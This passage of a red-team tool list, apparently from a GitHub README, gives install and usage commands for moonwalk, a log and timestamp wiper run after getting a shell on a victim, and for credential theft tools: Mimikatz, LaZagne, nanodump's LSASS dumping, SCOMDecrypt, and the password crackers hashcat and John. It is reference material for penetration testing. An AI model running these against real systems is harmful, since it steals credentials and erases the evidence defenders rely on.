href=\"https://github.com/mufeedvh/moonwalk\"\u003emoonwalk\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-moonwalk\" class=\"anchor\" aria-label=\"Permalink: 🔙moonwalk\" href=\"#moonwalk\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003emoonwalk is a 400 KB single-binary executable that can clear your traces while penetration testing a Unix machine.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt saves the state of system logs pre-exploitation and reverts that state including the filesystem timestamps post-exploitation leaving zero traces of a ghost in the shell.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk\"\u003e\u003cpre\u003ecurl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" 
data-snippet-clipboard-copy-content=\"# Start moonwalk straight after getting a shell on the victim Linux endpoint\ncurl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk\nchmod +x moonwalk\nmoonwalk start\n\n# Once you are finished, clear your traces \nmoonwalk finish\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Start moonwalk straight after getting a shell on the victim Linux endpoint\u003c/span\u003e\ncurl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk\nchmod +x moonwalk\nmoonwalk start\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Once you are finished, clear your traces \u003c/span\u003e\nmoonwalk finish\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/220959174-9c72922f-40cc-4843-bdc8-353cc55a3c51.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/220959174-9c72922f-40cc-4843-bdc8-353cc55a3c51.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/mufeedvh/moonwalk\"\u003ehttps://github.com/mufeedvh/moonwalk\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eCredential Access\u003c/h1\u003e\u003ca id=\"user-content-credential-access\" class=\"anchor\" aria-label=\"Permalink: Credential Access\" href=\"#credential-access\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 
1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/gentilkiwi/mimikatz\"\u003eMimikatz\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-mimikatz\" class=\"anchor\" aria-label=\"Permalink: 🔙Mimikatz\" href=\"#mimikatz\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eGreat tool for gaining access to hashed and cleartext passwords on a victims endpoint. 
Once you have gained privileged access to a system, drop this tool to collect some creds.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eDownload the \u003ca href=\"https://github.com/gentilkiwi/mimikatz/releases\"\u003emimikatz_trunk.7z\u003c/a\u003e file.\u003c/li\u003e\n\u003cli\u003eOnce downloaded, the \u003ccode\u003emimikatz.exe\u003c/code\u003e binary is in the \u003ccode\u003ex64\u003c/code\u003e folder.\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\".\\mimikatz.exe\nprivilege::debug\"\u003e\u003cpre\u003e.\u003cspan class=\"pl-cce\"\u003e\\m\u003c/span\u003eimikatz.exe\nprivilege::debug\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208253562-5c58d412-ed3e-4ab5-b8e7-11092852c3d0.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208253562-5c58d412-ed3e-4ab5-b8e7-11092852c3d0.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/AlessandroZ/LaZagne\"\u003eLaZagne\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-lazagne\" class=\"anchor\" aria-label=\"Permalink: 🔙LaZagne\" href=\"#lazagne\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 
1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNice tool for extracting locally stored passwords from browsers, databases, games, mail, git, wifi, etc.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Binary)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can install the standalone binary from \u003ca href=\"https://github.com/AlessandroZ/LaZagne/releases/\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Launch all modes\n.\\laZagne.exe all\n\n# Launch only a specific module\n.\\laZagne.exe browsers\n\n# Launch only a specific software script\n.\\laZagne.exe browsers -firefox\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Launch all modes\u003c/span\u003e\n.\u003cspan class=\"pl-cce\"\u003e\\l\u003c/span\u003eaZagne.exe all\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Launch only a specific module\u003c/span\u003e\n.\u003cspan class=\"pl-cce\"\u003e\\l\u003c/span\u003eaZagne.exe browsers\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Launch only a specific software script\u003c/span\u003e\n.\u003cspan class=\"pl-cce\"\u003e\\l\u003c/span\u003eaZagne.exe browsers -firefox\u003c/pre\u003e\u003c/div\u003e\n\u003cp 
dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208253800-48f960db-d569-4d1a-b39f-d6c7643691e2.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208253800-48f960db-d569-4d1a-b39f-d6c7643691e2.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/hashcat/hashcat\"\u003ehashcat\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-hashcat\" class=\"anchor\" aria-label=\"Permalink: 🔙hashcat\" href=\"#hashcat\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eTool for cracking password hashes. 
Supports a large list of hashing algorithms (Full list can be found \u003ca href=\"https://hashcat.net/wiki/doku.php?id=example_hashes\" rel=\"nofollow\"\u003ehere\u003c/a\u003e).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: Binary\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can install the standalone binary from \u003ca href=\"https://hashcat.net/hashcat/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\".\\hashcat.exe --help\"\u003e\u003cpre\u003e.\u003cspan class=\"pl-cce\"\u003e\\h\u003c/span\u003eashcat.exe --help\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNice hashcat command \u003ca href=\"https://cheatsheet.haax.fr/passcracking-hashfiles/hashcat_cheatsheet/\" rel=\"nofollow\"\u003echeatsheet\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208263419-94bf92c0-1c83-4366-a6c2-b6533fdcc521.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208263419-94bf92c0-1c83-4366-a6c2-b6533fdcc521.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/openwall/john\"\u003eJohn the Ripper\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-john-the-ripper\" class=\"anchor\" aria-label=\"Permalink: 🔙John the Ripper\" href=\"#john-the-ripper\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath 
d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eAnother password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs and GPUs.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt-get install john -y\"\u003e\u003cpre\u003esudo apt-get install john -y\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"john\"\u003e\u003cpre\u003ejohn\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208263690-8c2d1253-7261-47da-850d-ca5a8d98ca13.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208263690-8c2d1253-7261-47da-850d-ca5a8d98ca13.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca 
href=\"https://github.com/nccgroup/SCOMDecrypt\"\u003eSCOMDecrypt\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-scomdecrypt\" class=\"anchor\" aria-label=\"Permalink: 🔙SCOMDecrypt\" href=\"#scomdecrypt\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis tool is designed to retrieve and decrypt RunAs credentials stored within Microsoft System Center Operations Manager (SCOM) databases.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eNCC blog post - \u003ca href=\"https://research.nccgroup.com/2017/02/23/scomplicated-decrypting-scom-runas-credentials/\" rel=\"nofollow\"\u003e'SCOMplicated? – Decrypting SCOM “RunAs” credentials'\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003ePre-requisites:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eTo run the tool you will require administrative privileges on the SCOM server. 
You will also need to ensure that you have read access to the following registry key:\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\System Center\\2010\\Common\\MOMBins\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\System Center\\2010\\Common\\MOMBins\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eYou can check manually that you can see the database by gathering the connection details from the following keys:\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\System Center\\2010\\Common\\Database\\DatabaseServerName\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\System Center\\2010\\Common\\Database\\DatabaseName\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\System Center\\2010\\Common\\Database\\DatabaseServerName\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\System Center\\2010\\Common\\Database\\DatabaseName\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (PS1)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/nccgroup/SCOMDecrypt\ncd .\\SCOMDecrypt\\SCOMDecrypt\\\n. .\\Invoke-SCOMDecrypt.ps1\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/nccgroup/SCOMDecrypt\ncd .\\SCOMDecrypt\\SCOMDecrypt\\\n. 
.\\Invoke-SCOMDecrypt.ps1\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Compile)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eUsing \u003ca href=\"https://visualstudio.microsoft.com/vs/community/\" rel=\"nofollow\"\u003eVisual Studio 2019 Community Edition\u003c/a\u003e you can compile the SCOMDecrypt binary.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOpen the SCOMDecrypt \u003ca href=\"https://github.com/nccgroup/SCOMDecrypt\"\u003eproject .sln\u003c/a\u003e, choose \"Release\", and build.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# PS1\nInvoke-SCOMDecrypt\n\n# Compiled C# binary\n.\\SCOMDecrypt.exe\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e PS1\u003c/span\u003e\nInvoke-SCOMDecrypt\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Compiled C# binary\u003c/span\u003e\n.\u003cspan class=\"pl-cce\"\u003e\\S\u003c/span\u003eCOMDecrypt.exe\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210456718-034ba080-602e-423e-8ac3-b62ef0841208.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210456718-034ba080-602e-423e-8ac3-b62ef0841208.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage text used from \u003ca href=\"https://github.com/nccgroup/SCOMDecrypt\"\u003ehttps://github.com/nccgroup/SCOMDecrypt\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca 
href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/helpsystems/nanodump\"\u003enanodump\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-nanodump\" class=\"anchor\" aria-label=\"Permalink: 🔙nanodump\" href=\"#nanodump\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThe LSASS (Local Security Authority Subsystem Service) is a system process in the Windows operating system that is responsible for enforcing the security policy on the system. 
It is responsible for a number of tasks related to security, including authenticating users for logon, enforcing security policies, and generating audit logs.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCreating a dump of this process can allow an attacker to extract password hashes or other sensitive information from the process's memory, which could be used to compromise the system further.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003enanodump allows for the creation of a minidump of the LSASS process.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/helpsystems/nanodump.git\"\u003e\u003cpre\u003egit clone https://github.com/helpsystems/nanodump.git\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Linux with MinGW)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"make -f Makefile.mingw\"\u003e\u003cpre\u003emake -f Makefile.mingw\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Windows with MSVC)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"nmake -f Makefile.msvc\"\u003e\u003cpre\u003enmake -f Makefile.msvc\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (CobaltStrike only)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eImport the \u003ccode\u003eNanoDump.cna\u003c/code\u003e script in Cobalt Strike.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFull installation information can be found \u003ca 
href=\"https://github.com/helpsystems/nanodump\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Run\nnanodump.x64.exe\n\n# Leverage the Silent Process Exit technique\nnanodump --silent-process-exit C:\\Windows\\Temp\\\n\n# Leverage the Shtinkering technique\nnanodump --shtinkering\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run\u003c/span\u003e\nnanodump.x64.exe\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Leverage the Silent Process Exit technique\u003c/span\u003e\nnanodump --silent-process-exit C:\u003cspan class=\"pl-cce\"\u003e\\W\u003c/span\u003eindows\u003cspan class=\"pl-cce\"\u003e\\T\u003c/span\u003eemp\\\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Leverage the Shtinkering technique\u003c/span\u003e\nnanodump --shtinkering\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found \u003ca href=\"https://github.com/helpsystems/nanodump#1-usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210985548-a5e69f62-04da-4771-b06b-720147de08d0.jpg\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210985548-a5e69f62-04da-4771-b06b-720147de08d0.jpg\" alt=\"nanodump\" style=\"max-width: 